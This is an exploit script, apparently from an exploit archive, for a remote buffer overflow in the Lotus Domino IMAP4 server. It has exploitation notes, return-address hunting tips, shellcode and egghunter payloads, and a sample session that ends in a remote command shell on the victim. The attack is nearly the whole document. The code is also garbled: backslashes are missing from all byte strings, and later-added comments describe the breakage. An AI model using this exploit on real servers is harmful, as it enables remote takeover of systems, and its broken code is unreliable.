
# Title : Lotus Domino IMAP4 Server 6.5.4 Remote Buffer Overflow Exploit
# Published : 2007-07-20
# Author : dmc and prdelka


###########################################################################################
# Lotus Domino IMAP4 Server Release 6.5.4 / Windows 2000 Advanced Server x86 Remote Exploit
###########################################################################################
# Vulnerable: IBM Lotus Domino <= 7.0.2 && 6.5.5 FP2 (tested 6.5.4)
# Authors: Dominic Chell <dmc@digitalapocalypse.net> & prdelka
#
# Exploitation steps:
# 1) The instruction "call dword [ecx]" is performed with user supplied ECX
# 2) EAX references our buffer from retaddr onward
# 3) we put pointer in ECX to a pointer referencing "call eax"
# 4) a small payload decrements eax and then jmp's into the eax buffer due
#    to size limitations.
# 5) our larger payload is then executed.
#
# muts' exploit would not work for us, his egghunt uses 0x2e which is converted
# to 0x09 (.'s to [tab]'s) and his return address was not found on our test
# environment.
#
# Finding a Target:
# To find a target, attach a debugger to nimap.exe, cause the application
# to crash. Then use search function to find "call eax" or equivalent
# instruction in memory. Then, take the pointer to eax, such as "0x77ff1122"
# and search for another location in memory that has "0x11 0xff 0x77". This
# will be utilised for a return address if no instruction modify eax or
# subvert execution to another place in memory.
#
# Thanks to: nemo, hdm, jf, Winny Thomas, muts
#
###########################################################################################
# Note: it takes a few minutes for the egghunter to find the payload in memory
#
# For example:
# C:workexploitsimap>poc.py
# [*] sending payload
# [*] sending payload
# [*] sending payload
# [*] sending payload
# * OK Domino IMAP4 Server Release 6.5.4 ready Tue, 26 Jun 2007 15:18:36 +0100
#
# PDAwNEU5QkNCLjgwMjU3MzA2LjAwMDAwOUY4LjAwMDAwMDA5QERNQz4=
#
# sending...
# kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
# kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
# kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
# kJCQkJCQkJCQkJCQkJCQkJCQkJCQkNvS2XQk9FgpybEKu3E1If4xWBcDWBeDmcnDC2rgYnVG+2Q3
# BG5572VAQQov6VasmyGZmqi4dlFEk/x9Zwv0gcDrZXeQkJCD6FKD6FKD6FL/4CB4OcnLXAvHq421
# M2iR5FFG
#
#
# C:workexploitsimap>nc -vv 192.168.126.130 4444
# 2KVM-DC [192.168.126.130] 4444 (?) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-1999 Microsoft Corp.
#
# E:LotusDomino>
#
###########################################################################################

import socket, struct, md5, base64, sys, string, signal, getopt


class Exp_Lotus:
       """Target description: a host and an IMAP port.

       Defaults to the loopback address on 143; main() overwrites both
       attributes from the -h / -p options.
       """
       def __init__(self):
               self.host, self.port = '127.0.0.1', 143


def send_payload(host,port):
       """Open a TCP connection to host:port, read the banner, send a single
       ``a001 admin <payload>`` line, read one reply and close.

       ``payload`` is the 8-character marker followed by a long literal; as
       stored on this page the literals contain no backslash characters, so
       what this function transmits is the plain ASCII text shown, not the
       byte values the header comment talks about.  Errors are silenced by
       the bare ``except:`` at the end: the string beneath it is a bare
       expression statement, not a print, so a refused connection produces
       no output at all.
       """
       payload ="x54x30x30x57x54x30x30x57"
       payload += ("x31xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xf7"
       "x82xf8x80x83xebxfcxe2xf4x0bxe8x13xcdx1fx7bx07x7f"
       "x08xe2x73xecxd3xa6x73xc5xcbx09x84x85x8fx83x17x0b"
       "xb8x9ax73xdfxd7x83x13xc9x7cxb6x73x81x19xb3x38x19"
       "x5bx06x38xf4xf0x43x32x8dxf6x40x13x74xccxd6xdcxa8"
       "x82x67x73xdfxd3x83x13xe6x7cx8exb3x0bxa8x9exf9x6b"
       "xf4xaex73x09x9bxa6xe4xe1x34xb3x23xe4x7cxc1xc8x0b"
       "xb7x8ex73xf0xebx2fx73xc0xffxdcx90x0exb9x8cx14xd0"
       "x08x54x9exd3x91xeaxcbxb2x9fxf5x8bxb2xa8xd6x07x50"
       "x9fx49x15x7cxccxd2x07x56xa8x0bx1dxe6x76x6fxf0x82"
       "xa2xe8xfax7fx27xeax21x89x02x2fxafx7fx21xd1xabxd3"
       "xa4xd1xbbxd3xb4xd1x07x50x91xeaxe9xdcx91xd1x71x61"
       "x62xeax5cx9ax87x45xafx7fx21xe8xe8xd1xa2x7dx28xe8"
       "x53x2fxd6x69xa0x7dx2exd3xa2x7dx28xe8x12xcbx7exc9"
       "xa0x7dx2exd0xa3xd6xadx7fx27x11x90x67x8ex44x81xd7"
       "x08x54xadx7fx27xe4x92xe4x91xeax9bxedx7ex67x92xd0"
       "xaexabx34x09x10xe8xbcx09x15xb3x38x73x5dx7cxbaxad"
       "x09xc0xd4x13x7axf8xc0x2bx5cx29x90xf2x09x31xeex7f"
       "x82xc6x07x56xacxd5xaaxd1xa6xd3x92x81xa6xd3xadxd1"
       "x08x52x90x2dx2ex87x36xd3x08x54x92x7fx08xb5x07x50"
       "x7cxd5x04x03x33xe6x07x56xa5x7dx28xe8x07x08xfcxdf"
       "xa4x7dx2ex7fx27x82xf8x80")

       try:
               s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
               connect=s.connect((host,port))  # connect() returns None; 'connect' is never read
               d=s.recv(1024)  # server banner, discarded
               print "[*] sending payload"
               s.send('a001 admin ' + payload + 'rn')
               d=s.recv(1024)  # reply, discarded
               s.close()
       except:
               # No-op expression: nothing is printed or re-raised on failure.
               "Can't connect to IMAP server"

def usage():
       """Write the banner and the -h/-p option summary to stdout, then exit
       with status 2 (raises SystemExit)."""
       lines = [
               sys.argv[0] + "nntLotus Domino 6.5.4 Windows 2000 Advanced Server x86 Exploitntauthor: dmc@digitalapocalypse.net & prdelka",
               "t-h host",
               "t-p port",
       ]
       sys.stdout.write("\n".join(lines) + "\n")
       sys.exit(2)

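def signal_handler(signum, frame):
       """SIGINT handler: report on stdout and exit with status 0.

       The first parameter is named ``signum`` rather than ``signal`` so it
       no longer shadows the ``signal`` module inside this function.  Both
       parameters are required by the signal.signal() handler contract and
       are otherwise unused.
       """
       # Single-argument print() form produces the same output under
       # Python 2 and 3.
       print('err: caught sigint, exiting')
       sys.exit(0)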

def exp(host, port):
       """Second stage: drive the IMAP CRAM-MD5 exchange against host:port.

       Reads the banner, sends ``a001 authenticate cram-md5``, takes the
       server's reply minus its first two characters (presumably the ``+ ``
       continuation prefix), computes a plain MD5 of that text (note: not
       the keyed HMAC-MD5 that RFC 2195 CRAM-MD5 specifies) and sends
       ``buffer`` + packed return address + stub + ' ' + digest, base64
       encoded, as the authentication response.  As with send_payload, the
       literals here contain no backslash characters on this page, and the
       bare ``except:`` swallows every error without printing anything.
       ``buffer`` also shadows the Python 2 builtin of that name.
       """
       buffer = "x90" * 193
       buffer += ("xdbxd2xd9x74x24xf4x58x29xc9xb1x0axbbx71x35x21"
       "xfex31x58x17x03x58x17x83x99xc9xc3x0bx6axe0x62"
       "x75x46xfbx64x37x04x6ex79xefx65x40x41x0ax2fxe9"
       "x56xacx9bx21x99x9axa8xb8x76x51x44x93xfcx7dx67"
       "x0bxf4x81")

       try:
               s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
               connect=s.connect((host,port))  # return value (None) is never read
               d=s.recv(1024)
               print d  # server banner
               s.send('a001 authenticate cram-md5rn')
               d=s.recv(1024)
               d=d[2:1022].strip()  # drop the 2-char prefix; everything after it is the challenge
               print d
               m=md5.new()  # Python 2-era md5 module
               m.update(d)
               digest = m.digest()  # raw 16-byte MD5 of the challenge text, no key
               buffer += struct.pack('<L',  0x7765ebc0) # call eax 6014DC6E (ptr to 6014DC68)
               buffer += "x90x90x90x83xE8x52x83xE8x52x83xE8x52xFFxE0"
               buffer = buffer + ' ' + digest
               s.send(base64.encodestring(buffer) + 'rn')
               print "nsending...n", base64.encodestring(buffer) , 'rn'
       except:
               # No-op expression: failures are silent; the socket is not closed here.
               "Can't connect to IMAP server"

def main(argv=None):
       """Parse ``-h host`` / ``-p port`` from *argv* (``sys.argv[1:]`` when
       None), install the SIGINT handler, call send_payload four times and
       then exp once against the chosen host and port.  Missing arguments
       or a getopt error route to usage(), which exits.
       """
       args_in = sys.argv[1:] if argv is None else argv
       if not args_in:
               usage()

       try:
               opts, _rest = getopt.getopt(args_in, 'h:p:')
       except getopt.GetoptError:
               usage()

       signal.signal(signal.SIGINT, signal_handler)

       target = Exp_Lotus()
       for flag, value in opts:
               if flag == '-h':
                       target.host = value.strip()
               elif flag == '-p':
                       target.port = int(value)

       for _ in range(4):
               send_payload(target.host, target.port)
       exp(target.host, target.port)

if __name__ == '__main__':
       main()
